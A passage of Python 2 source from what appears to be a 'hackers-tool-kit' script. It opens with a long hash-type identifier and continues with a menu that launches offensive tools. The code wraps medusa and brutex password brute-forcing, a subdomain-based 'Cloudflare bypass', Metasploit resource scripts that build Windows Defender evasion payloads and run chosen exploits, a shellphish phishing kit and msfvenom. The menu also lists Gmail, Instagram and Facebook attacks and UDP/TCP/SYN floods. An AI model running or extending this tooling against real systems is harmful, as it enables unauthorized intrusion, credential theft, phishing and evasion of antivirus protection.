hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + 